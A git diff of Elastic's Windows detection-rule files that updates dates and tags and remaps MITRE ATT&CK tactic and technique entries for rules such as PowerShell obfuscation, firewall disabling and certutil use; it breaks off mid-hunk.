a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml index c8686112bee..251ddd0e74c 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_reverse_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,14 +100,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -153,39 +146,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml index ef57939e469..1886459dd34 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_concat.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,14 +98,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -152,39 +145,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml index c92ccaac12b..95a1b579929 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_string_format.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_string_format.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/03" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,14 +100,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -174,39 +167,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml index eea41de377c..451282d8be6 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_whitespace_special_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -167,39 +167,21 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" - +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_process_injection.toml b/rules/windows/defense_evasion_posh_process_injection.toml index 26f4689951f..eb10b5a9081 100644 --- a/rules/windows/defense_evasion_posh_process_injection.toml +++ b/rules/windows/defense_evasion_posh_process_injection.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/14" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -139,49 +139,34 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" -[[rule.threat.technique.subtechnique]] -id = "T1055.001" -name = "Dynamic-link Library Injection" -reference = "https://attack.mitre.org/techniques/T1055/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1055.002" -name = "Portable Executable Injection" -reference = "https://attack.mitre.org/techniques/T1055/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml index 772ec9c6030..e8dd124e358 100644 --- a/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml +++ b/rules/windows/defense_evasion_powershell_windows_firewall_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] @@ -74,21 +74,7 @@ references = [ risk_score = 47 rule_id = "f63c8e3c-d396-404f-b2ea-0379d3942d73" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -106,36 +92,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml index d3516cd5119..3601255196c 100644 --- a/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml +++ b/rules/windows/defense_evasion_reg_disable_enableglobalqueryblocklist.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -94,31 +94,23 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml index 7aba4b1f611..38470bfed72 100644 --- a/rules/windows/defense_evasion_regmod_remotemonologue.toml +++ b/rules/windows/defense_evasion_regmod_remotemonologue.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2025/09/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,18 +54,7 @@ references = [ risk_score = 47 rule_id = "c18975f5-676c-4091-b626-81e8938aa2ee" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -118,19 +107,36 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/defense_evasion_right_to_left_override.toml b/rules/windows/defense_evasion_right_to_left_override.toml index 2b351c4f41b..b51b6537de2 100644 --- a/rules/windows/defense_evasion_right_to_left_override.toml +++ b/rules/windows/defense_evasion_right_to_left_override.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,36 +87,18 @@ any where host.os.type == "windows" and event.category in ("file", "process") an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.002" name = "Right-to-Left Override" reference = "https://attack.mitre.org/techniques/T1036/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_sc_sdset.toml b/rules/windows/defense_evasion_sc_sdset.toml index e543bd70b60..1bd4d0e93cb 100644 --- a/rules/windows/defense_evasion_sc_sdset.toml +++ b/rules/windows/defense_evasion_sc_sdset.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/16" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,19 +65,7 @@ references = [ risk_score = 47 rule_id = "5188c68e-d3de-4e96-994d-9e242269446f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -91,31 +79,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml index baa9ab7adee..e89f301a889 100644 --- a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml +++ b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/23" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32 risk_score = 47 rule_id = "9aa0e1f6-52ce-42e1-abb3-09657cee2698" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -88,36 +75,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.002" name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" - +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml index 4436cce7568..fdb46fca621 100644 --- a/rules/windows/defense_evasion_sdelete_like_filename_rename.toml +++ b/rules/windows/defense_evasion_sdelete_like_filename_rename.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,20 +58,7 @@ This rule identifies file name patterns generated by the use of SDelete utility risk_score = 21 rule_id = "5aee924b-6ceb-4633-980e-1bde8cdb40c5" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Impact", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -82,31 +69,18 @@ file where host.os.type == "windows" and event.type == "change" and file.name : [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 18215c26fe3..007beca6c09 100644 --- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,20 +64,7 @@ references = [ risk_score = 47 rule_id = "b9960fef-82c6-4816-befa-44745030e917" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -99,6 +86,7 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -108,32 +96,13 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index d31877d1658..fb5d81c08d8 100644 --- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -112,20 +112,7 @@ references = [ risk_score = 47 rule_id = "fd70c98a-c410-42dc-a2e3-761c71848acf" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" @@ -140,14 +127,39 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index cf9205c5fcc..219ae03cc8f 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,15 +86,32 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] 